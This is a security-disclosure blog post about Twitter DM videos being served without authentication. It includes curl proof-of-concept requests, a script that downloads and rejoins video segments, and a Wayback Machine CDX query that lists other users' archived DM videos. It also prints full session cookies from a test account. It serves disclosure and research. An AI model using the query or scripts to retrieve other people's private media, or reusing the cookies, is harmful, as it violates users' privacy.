2022-12-12: Twitter DM Videos Are Accessible to Unauthenticated Users
 |
| @Whitekitty2012 DMing @BKitty2020 an image -- Twitter works very hard to protect this image from access by third parties. |
 |
| @Whitekitty2012 DMing @BKitty2020 a video -- unlike the image above, this video has no HTTP protection. |
We have created a simple example that demonstrates that while Twitter goes to great lengths to protect images shared in direct messages (DMs), the videos shared in DMs enjoy no such protections (see also: 2022-12-22 update). Both image and video URLs are named based on hashes and would be difficult if not functionally impossible to guess:
Image URL: https://ton.twitter.com/i/ton/data/dm/1600870219324465156/1600870190459256832/KM0EBzij.jpg:small
Video URL: https://video.twimg.com/dm_video/1600877027330064385/pl/320x180/Vn4h39llbQ0jfr1D.m3u8?container=fmp4
However, if the URLs are somehow leaked (e.g., guessing, reverse engineering, brute force, exported through HAR files, intercepted by proxies), twitter.com protects the DM images from unauthorized HTTP access through session-specific cookies, but the DM videos are available for anyone to access with no HTTP protection. In short, videos in DMs are protected only through their opaque URLs.
 |
| Right clicking on the URL and choosing "Copy as curl" reproduces the HTTP request your browser used to request this image. |
The curl request which duplicates the above browser request returns a 200 OK response:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| % curl 'https://ton.twitter.com/i/ton/data/dm/1600870219324465156/1600870190459256832/KM0EBzij.jpg:small' \ | |
| -X 'GET' \ | |
| -H 'Cookie: _ga=GA1.2.1578974351.1658522778; _gid=GA1.2.1415303809.1669565137; twid=u%3D1600710747004305409; att=1-EAfZonmiIFAabN7WJFAYruyozkoR4R1UXTi9Mrbd; auth_token=0f57cc642e5efc86e77113c4c6e26e63f4a8277c; ct0=6affe5131db8f27b7e737d10cc4db10ba7a18e09c64ae1049daf2113619feb98bb3fc2d2c2a9dc0bbb4890329e2871639a67cdd121c5962552fdae23dc2238c776da3a6296484e3b51ee9da53abb120a; kdt=1pjaQNrUHWOACrgtiPbMODtq9EtyfO2zjyqIRn2M; _twitter_sess=BAh7CSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCOIYHPCEAToMY3NyZl9p%250AZCIlNWZjNjY2YTUwMjIwYjY2ODU0OGMzNDFlNjdmYzg2NmU6B2lkIiVkZTg1%250ANjg4ZjJkMDZjZGM1MDlhNjIyMjJlMDQ5ZTA2NQ%253D%253D--5208257722568ae7fb82098c4a047426afb617b2; external_referer=5R4llnU6LiS6nKIFlrLdVgSXOiDO0qILODRlwl3mUPKfPbBdozq%2F%2BhlJutu4u37W|1|8e8t2xd8A2w%3D; dnt=1; guest_id=v1%3A167047567821699925; personalization_id="v1_jeT69pPEhhQw02CPfmk+gA=="; guest_id_ads=v1%3A157695208658630181; guest_id_marketing=v1%3A157695208658630181; remember_checked_on=1' \ | |
| -H 'Accept: image/webp,image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5' \ | |
| -H 'Accept-Encoding: gzip, deflate, br' \ | |
| -H 'Host: ton.twitter.com' \ | |
| -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15' \ | |
| -H 'Accept-Language: en-us' \ | |
| -H 'Referer: https://twitter.com/' \ | |
| -H 'Connection: keep-alive' > wk-bk.jpeg | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 22425 100 22425 0 0 109k 0 --:--:-- --:--:-- --:--:-- 109k | |
| % open wk-bk.jpeg |
In the screenshot below, right-clicking on the image URL and selecting "Copy as curl" allows one to reproduce the request sent by the browser to the server. The example uses the HTTP cookie from @Whitekitty2012 and if that session is closed, the URL is no longer accessible:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| % curl -i 'https://ton.twitter.com/i/ton/data/dm/1600870219324465156/1600870190459256832/KM0EBzij.jpg:small' \ | |
| -X 'GET' \ | |
| -H 'Cookie: _ga=GA1.2.1578974351.1658522778; _gid=GA1.2.1415303809.1669565137; twid=u%3D1600710747004305409; att=1-n11EVoxa8oM767165HUbjPZ8YJFiYvFZMzw3uCFr; auth_token=88ba7e40f9067e | |
| ec06c5501f86da52c9658dbf3b; ct0=43a7ed19a7f2dd7d0f8cf464bb9ac2b31fcacf0288a38c2c8a0773a2327a4f7d82b02030b5255758b42c5cd26ff817784a488a3fbd108dff3963f4ba66b3a1d46cd2ac8031028e57f6a3bd | |
| 25253aae40; kdt=1pjaQNrUHWOACrgtiPbMODtq9EtyfO2zjyqIRn2M; _twitter_sess=BAh7CSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCEj9I | |
| POEAToMY3NyZl9p%250AZCIlZWQ5OGM3NWE3NjliNWM5YTExYTAyODEwZjEzMzE2ZmQ6B2lkIiUxOGI2%250AZjk4Y2Q2NTlmMjI1YWQxNDAxZTEyNjhhNjI5NA%253D%253D--8432d160885b961f50dd7ad4bfac669c10cd8f1b; gt=16 | |
| 00929594542067725; dnt=1; guest_id=v1%3A167052633266899352; personalization_id="v1_I8bVcj9tTkUu6IElXKvpxA=="; guest_id_ads=v1%3A157695208658630181; guest_id_marketing=v1%3A1576952086 | |
| 58630181; remember_checked_on=1' \ | |
| -H 'Accept: image/webp,image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5' \ | |
| -H 'Host: ton.twitter.com' \ | |
| -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15' \ | |
| -H 'Accept-Language: en-us' \ | |
| -H 'Referer: https://twitter.com/' \ | |
| -H 'Connection: keep-alive' | |
| HTTP/2 401 | |
| date: Thu, 08 Dec 2022 19:20:26 UTC | |
| perf: 7626143928 | |
| server: tsa_b | |
| cache-control: no-cache | |
| content-length: 0 | |
| x-transaction-id: b7637e1d0cca1353 | |
| timing-allow-origin: https://twitter.com, https://mobile.twitter.com | |
| x-content-type-options: nosniff | |
| strict-transport-security: max-age=631138519 | |
| x-response-time: 5 | |
| x-connection-hash: 5161af05a9e051d7c2df362290b685cdbe9c1722ef4c0b836b96a54070d4fa0f |
If a user who is logged in but not part of the DM conversation attempts to access the URL, the server will return a 404. After the session has ended, the server will eventually not even return an HTTP response for the image; it will just silently fail.
Even though Twitter DM images have opaque URLs, Twitter works very hard to protect access to image URLs: they are protected by session Cookies and cannot be accessed if the session is not active or if members outside of the conversation attempt to access the URL.
Twitter DM videos are also opaquely named, but there is no HTTP protection for their URLs. The screenshots below show the browser dev tools, and right-clicking on the "m3u8" file.
 |
| Right-clicking on the .m3u8 file. |
 |
| The same image as above, just scrolled down. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| % curl -i "https://video.twimg.com/dm_video/1600877027330064385/pl/320x180/Vn4h39llbQ0jfr1D.m3u8?container=fmp4" | |
| HTTP/2 200 | |
| perf: 7626143928 | |
| content-type: application/x-mpegURL | |
| cache-control: max-age=604800, must-revalidate | |
| last-modified: Thu, 08 Dec 2022 15:34:40 GMT | |
| x-transaction-id: 8d01a92de1228077 | |
| timing-allow-origin: https://twitter.com, https://mobile.twitter.com | |
| x-content-type-options: nosniff | |
| strict-transport-security: max-age=631138519 | |
| access-control-allow-origin: * | |
| access-control-expose-headers: Content-Length | |
| accept-ranges: bytes | |
| date: Thu, 08 Dec 2022 16:21:09 GMT | |
| x-served-by: cache-fty21349-FTY, cache-iad-kiad7000031-IAD | |
| x-cache: MISS, MISS | |
| vary: Accept-Encoding | |
| x-tw-cdn: FT | |
| server-timing: x-cache;desc=MISS, x-tw-cdn;desc=FT | |
| content-length: 1177 | |
| #EXTM3U | |
| #EXT-X-VERSION:6 | |
| #EXT-X-MEDIA-SEQUENCE:0 | |
| #EXT-X-TARGETDURATION:3 | |
| #EXT-X-PLAYLIST-TYPE:VOD | |
| #EXT-X-MAP:URI="/dm_video/1600877027330064385/vid/0/0/320x180/jZYOJeLERXPOC4qe.mp4" | |
| #EXTINF:3.000, | |
| /dm_video/1600877027330064385/vid/0/3000/320x180/l1mZtezfzjRRYziE.m4s | |
| #EXTINF:3.000, | |
| /dm_video/1600877027330064385/vid/3000/6000/320x180/yxhsDmzuJG9ZqtYb.m4s | |
| #EXTINF:3.000, | |
| /dm_video/1600877027330064385/vid/6000/9000/320x180/KGtEzr2KaRfP4Y6H.m4s | |
| #EXTINF:3.000, | |
| /dm_video/1600877027330064385/vid/9000/12000/320x180/V1cXuDCxjXKk_JT9.m4s | |
| #EXTINF:3.000, | |
| /dm_video/1600877027330064385/vid/12000/15000/320x180/CtUTfpf83EHjEFjd.m4s | |
| #EXTINF:3.000, | |
| /dm_video/1600877027330064385/vid/15000/18000/320x180/lGncur15MHC6fvKg.m4s | |
| #EXTINF:3.000, | |
| /dm_video/1600877027330064385/vid/18000/21000/320x180/2U51PtuljYpAxhRr.m4s | |
| #EXTINF:3.000, | |
| /dm_video/1600877027330064385/vid/21000/24000/320x180/gs-8pNvThX_1kjx0.m4s | |
| #EXTINF:3.000, | |
| /dm_video/1600877027330064385/vid/24000/27000/320x180/f1UDV6NW3odTL-ux.m4s | |
| #EXTINF:3.000, | |
| /dm_video/1600877027330064385/vid/27000/30000/320x180/9hFdPsP3QYV8c130.m4s | |
| #EXTINF:2.100, | |
| /dm_video/1600877027330064385/vid/30000/32100/320x180/yFOkibojJs9PWhkX.m4s | |
| #EXT-X-ENDLIST |
We can convert the relative URLs in the Media Playlist to full URLs and write a small script to grab all the parts and then concatenate them together. Note that no HTTP Cookies are required.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| % cat run-me.sh | |
| #!/bin/csh -x | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/0/0/320x180/jZYOJeLERXPOC4qe.mp4" > | |
| 00.mp4 | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/0/3000/320x180/l1mZtezfzjRRYziE.m4s " > | |
| 01.m4s | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/3000/6000/320x180/yxhsDmzuJG9ZqtYb.m4s " | |
| > 02.m4s | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/6000/9000/320x180/KGtEzr2KaRfP4Y6H.m4s " | |
| > 03.m4s | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/9000/12000/320x180/V1cXuDCxjXKk_JT9.m4s | |
| " > 04.m4s | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/12000/15000/320x180/CtUTfpf83EHjEFjd.m4s | |
| " > 05.m4s | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/15000/18000/320x180/lGncur15MHC6fvKg.m4s | |
| " > 06.m4s | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/18000/21000/320x180/2U51PtuljYpAxhRr.m4s | |
| " > 07.m4s | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/21000/24000/320x180/gs-8pNvThX_1kjx0.m4s | |
| " > 08.m4s | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/24000/27000/320x180/f1UDV6NW3odTL-ux.m4s | |
| " > 09.m4s | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/27000/30000/320x180/9hFdPsP3QYV8c130.m4s | |
| " > 10.m4s | |
| curl "https://video.twimg.com/dm_video/1600877027330064385/vid/30000/32100/320x180/yFOkibojJs9PWhkX.m4s | |
| " > 11.m4s | |
| % ./run-me.sh | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/0/0/320x180/jZYOJeLERXPOC4qe.mp4 | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 1130 100 1130 0 0 6208 0 --:--:-- --:--:-- --:--:-- 6208 | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/0/3000/320x180/l1mZtezfzjRRYziE.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 37919 100 37919 0 0 251k 0 --:--:-- --:--:-- --:--:-- 251k | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/3000/6000/320x180/yxhsDmzuJG9ZqtYb.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 35423 100 35423 0 0 283k 0 --:--:-- --:--:-- --:--:-- 283k | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/6000/9000/320x180/KGtEzr2KaRfP4Y6H.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 36960 100 36960 0 0 243k 0 --:--:-- --:--:-- --:--:-- 243k | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/9000/12000/320x180/V1cXuDCxjXKk_JT9.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 43395 100 43395 0 0 181k 0 --:--:-- --:--:-- --:--:-- 181k | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/12000/15000/320x180/CtUTfpf83EHjEFjd.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 47333 100 47333 0 0 185k 0 --:--:-- --:--:-- --:--:-- 184k | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/15000/18000/320x180/lGncur15MHC6fvKg.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 41711 100 41711 0 0 162k 0 --:--:-- --:--:-- --:--:-- 162k | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/18000/21000/320x180/2U51PtuljYpAxhRr.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 38884 100 38884 0 0 132k 0 --:--:-- --:--:-- --:--:-- 132k | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/21000/24000/320x180/gs-8pNvThX_1kjx0.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 36449 100 36449 0 0 144k 0 --:--:-- --:--:-- --:--:-- 144k | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/24000/27000/320x180/f1UDV6NW3odTL-ux.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 32279 100 32279 0 0 92755 0 --:--:-- --:--:-- --:--:-- 92755 | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/27000/30000/320x180/9hFdPsP3QYV8c130.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 32413 100 32413 0 0 109k 0 --:--:-- --:--:-- --:--:-- 109k | |
| curl https://video.twimg.com/dm_video/1600877027330064385/vid/30000/32100/320x180/yFOkibojJs9PWhkX.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 22617 100 22617 0 0 94237 0 --:--:-- --:--:-- --:--:-- 93846 | |
| % cat 00.mp4 *.m4s > wk-bk-dm-video.mp4 | |
| % ls -l wk-bk-dm-video.mp4 | |
| -rw-r--r--@ 1 mln2 staff 406513 Dec 8 11:32 wk-bk-dm-video.mp4 | |
| % open wk-bk-dm-video.mp4 |
We also pushed the .mp4 and .m4s files into the Internet Archive's Wayback Machine using the Save Page Now interface. Note that most public web archives, the Wayback Machine runs without being logged into Twitter -- this means that the fact that Wayback Machine could archive these video files means they were not protected at all. Below is a similar script as above, but here we are accessing the Twitter DM video files after we've pushed them into the Wayback Machine:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| % cat run-me-ia.sh | |
| #!/bin/csh -x | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /0/0/320x180/jZYOJeLERXPOC4qe.mp4" > ia-00.mp4 | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /0/3000/320x180/l1mZtezfzjRRYziE.m4s " > ia-01.m4s | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /3000/6000/320x180/yxhsDmzuJG9ZqtYb.m4s " > ia-02.m4s | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /6000/9000/320x180/KGtEzr2KaRfP4Y6H.m4s " > ia-03.m4s | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /9000/12000/320x180/V1cXuDCxjXKk_JT9.m4s " > ia-04.m4s | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /12000/15000/320x180/CtUTfpf83EHjEFjd.m4s " > ia-05.m4s | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /15000/18000/320x180/lGncur15MHC6fvKg.m4s " > ia-06.m4s | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /18000/21000/320x180/2U51PtuljYpAxhRr.m4s " > ia-07.m4s | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /21000/24000/320x180/gs-8pNvThX_1kjx0.m4s " > ia-08.m4s | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /24000/27000/320x180/f1UDV6NW3odTL-ux.m4s " > ia-09.m4s | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /27000/30000/320x180/9hFdPsP3QYV8c130.m4s " > ia-10.m4s | |
| curl -L | |
| "https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid | |
| /30000/32100/320x180/yFOkibojJs9PWhkX.m4s " > ia-11.m4s | |
| % ./run-me-ia.sh | |
| curl -L | |
| https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ | |
| 0/0/320x180/jZYOJeLERXPOC4qe.mp4 | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 0 0 0 0 0 0 0 --:--:-- 0:00:03 --:--:-- 0 | |
| 100 1130 100 1130 0 0 255 0 0:00:04 0:00:04 --:--:-- 3434 | |
| curl -L | |
| https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ | |
| 0/3000/320x180/l1mZtezfzjRRYziE.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 00 000 0 0 --:--:-- --:--:-- --:--:-- 0 | |
| 100 37919 100 37919 0 0 18143 0 0:00:02 0:00:02 --:--:-- 77071 | |
| curl -L https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ 3000/6000/320x180/yxhsDmzuJG9ZqtYb.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 00 000 0 0 --:--:-- --:--:-- --:--:-- 0 | |
| 100 35423 100 35423 0 0 17355 0 0:00:02 0:00:02 --:--:-- 96520 | |
| curl -L https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ 6000/9000/320x180/KGtEzr2KaRfP4Y6H.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 00 000 0 0 --:--:-- 0:00:01 --:--:-- 0 | |
| 100 36960 100 36960 0 0 16332 0 0:00:02 0:00:02 --:--:-- 16332 | |
| curl -L https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ 9000/12000/320x180/V1cXuDCxjXKk_JT9.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 00 000 0 0 --:--:-- 0:00:01 --:--:-- 0 | |
| 100 43395 100 43395 0 0 24094 0 0:00:01 0:00:01 --:--:-- 24094 | |
| curl -L https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ 12000/15000/320x180/CtUTfpf83EHjEFjd.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 00 000 0 0 --:--:-- --:--:-- --:--:-- 0 | |
| 100 47333 100 47333 0 0 34676 0 0:00:01 0:00:01 --:--:-- 276k | |
| curl -L https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ 15000/18000/320x180/lGncur15MHC6fvKg.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 00 000 0 0 --:--:-- 0:00:02 --:--:-- 0 | |
| 100 41711 100 41711 0 0 14407 0 0:00:02 0:00:02 --:--:-- 0 | |
| curl -L https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ 18000/21000/320x180/2U51PtuljYpAxhRr.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 00 000 0 0 --:--:-- --:--:-- --:--:-- 0 | |
| 100 38884 100 38884 0 0 24957 0 0:00:01 0:00:01 --:--:-- 303k | |
| curl -L https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ 21000/24000/320x180/gs-8pNvThX_1kjx0.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 00 000 0 0 --:--:-- 0:00:01 --:--:-- 0 | |
| 100 36449 100 36449 0 0 19596 0 0:00:01 0:00:01 --:--:-- 348k | |
| curl -L https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ 24000/27000/320x180/f1UDV6NW3odTL-ux.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 00 000 0 0 --:--:-- 0:00:02 --:--:-- 0 | |
| 100 32279 100 32279 0 0 8039 0 0:00:04 0:00:04 --:--:-- 91962 | |
| curl -L https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ 27000/30000/320x180/9hFdPsP3QYV8c130.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0 | |
| 100 32413 100 32413 0 0 9866 0 0:00:03 0:00:03 --:--:-- 45080 | |
| curl -L | |
| https://web.archive.org/web/20221208194342id_/https://video.twimg.com/dm_video/1600877027330064385/vid/ | |
| 30000/32100/320x180/yFOkibojJs9PWhkX.m4s | |
| % Total % Received % Xferd Average Speed Time Time Time Current | |
| Dload Upload Total Spent Left Speed | |
| 100 22617 100 22617 0 0 13790 0 0:00:01 0:00:01 --:--:-- 13782 | |
| % ls -l ia-??.* | |
| -rw-r--r-- 1 mln2 staff 1130 Dec 8 14:51 ia-00.mp4 | |
| -rw-r--r-- 1 mln2 staff 37919 Dec 8 14:52 ia-01.m4s | |
| -rw-r--r-- 1 mln2 staff 35423 Dec 8 14:52 ia-02.m4s | |
| -rw-r--r-- 1 mln2 staff 36960 Dec 8 14:52 ia-03.m4s | |
| -rw-r--r-- 1 mln2 staff 43395 Dec 8 14:52 ia-04.m4s | |
| -rw-r--r-- 1 mln2 staff 47333 Dec 8 14:52 ia-05.m4s | |
| -rw-r--r-- 1 mln2 staff 41711 Dec 8 14:52 ia-06.m4s | |
| -rw-r--r-- 1 mln2 staff 38884 Dec 8 14:52 ia-07.m4s | |
| -rw-r--r-- 1 mln2 staff 36449 Dec 8 14:52 ia-08.m4s | |
| -rw-r--r-- 1 mln2 staff 32279 Dec 8 14:52 ia-09.m4s | |
| -rw-r--r-- 1 mln2 staff 32413 Dec 8 14:52 ia-10.m4s | |
| -rw-r--r-- 1 mln2 staff 22617 Dec 8 14:52 ia-11.m4s | |
| % cat ia-00.mp4 ia-*m4s > ia-wk-bk-dm-video.mp4 | |
| % ls -l wk-bk-dm-video.mp4 ia-wk-bk-dm-video.mp4 | |
| -rw-r--r-- 1 mln2 staff 406513 Dec 8 14:52 ia-wk-bk-dm-video.mp4 | |
| -rw-r--r--@ 1 mln2 staff 406513 Dec 8 11:32 wk-bk-dm-video.mp4 | |
| % diff -s wk-bk-dm-video.mp4 ia-wk-bk-dm-video.mp4 | |
| Files wk-bk-dm-video.mp4 and ia-wk-bk-dm-video.mp4 are identical |
In summary, Twitter works very hard to protect images shared in DMs, but offers no HTTP protection to videos shared in DMs. Yes, the URL names are presumably difficult if not impossible to guess, but there could be heretofore unknown mechanisms for an attacker to exfiltrate or reverse engineer these URLs, in which case the videos can be accessed by anyone unauthenticated client on the web.
We reported this situation to Twitter via HackerOne (#1798935), but the report was triaged and closed.
A more detailed version of this vulnerability is provided in:
Michael L. Nelson, Twitter DM Videos Are Accessible to Unauthenticated Users, arXiv:2212.05322, 2022.
--Michael
 |
| The shared image, White Kitty (background) and Black Kitty (foreground). |
 |
| The reported issue; triaged & closed. |
2022-12-22 Update:
Not counting the one we generated for this study, here are approximately 102 video files from Twitter DMs already archived in the Wayback Machine. The earliest example is from 2016-03-04:
% curl -s "http://web.archive.org/cdx/search/cdx?url=video.twimg.com/dm_video/&matchType=prefix" | awk '{print "https://web.archive.org/web/" $2 "/" $3};' | grep -v "1600877027330064385" | sort -n -k 10 -t "/" -u | grep 2016 | head -1
https://web.archive.org/web/20160304122159/https://video.twimg.com/dm_video/70284737[redacted].mp4?_=1
Furthermore, we have established that video.twimg.com does not require HTTPS; it will serve files via HTTP (i.e., without TLS):
% curl -I http://video.twimg.com/dm_video/1600877027330064385/vid/0/3000/320x180/l1mZtezfzjRRYziE.m4s
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 37919
perf: 7626143928
content-type: video/mp4
cache-control: max-age=604800, must-revalidate
last-modified: Thu, 08 Dec 2022 15:34:40 GMT
x-transaction-id: 4e772788c1fdbf85
timing-allow-origin: https://twitter.com, https://mobile.twitter.com
x-content-type-options: nosniff
strict-transport-security: max-age=631138519
access-control-allow-origin: *
access-control-expose-headers: Content-Length
Accept-Ranges: bytes
Date: Thu, 22 Dec 2022 20:59:53 GMT
X-Served-By: cache-fty21368-FTY, cache-iad-kjyo7100091-IAD
X-Cache: MISS, MISS
x-tw-cdn: FT
Server-Timing: x-cache;desc=MISS, x-tw-cdn;desc=FT
While continued http support is curious, it is not exploitable since twitter.com has a Content-Security-Policy response header with a value of:
% curl -Is https://twitter.com | grep -i Content-Security-Policy
content-security-policy: connect-src 'self' blob: https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://aa.twitter.com https://caps.twitter.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://accounts.google.com/gsi/status [deletia]
Attempts to load content from http://video.twimg.com/ (i.e., http and not https) will be blocked as shown in the figure below.
 |
| connect-src in Content-Security-Policy will block requests to http://video.twimg.com/ (bottom right). |
Comments
Post a Comment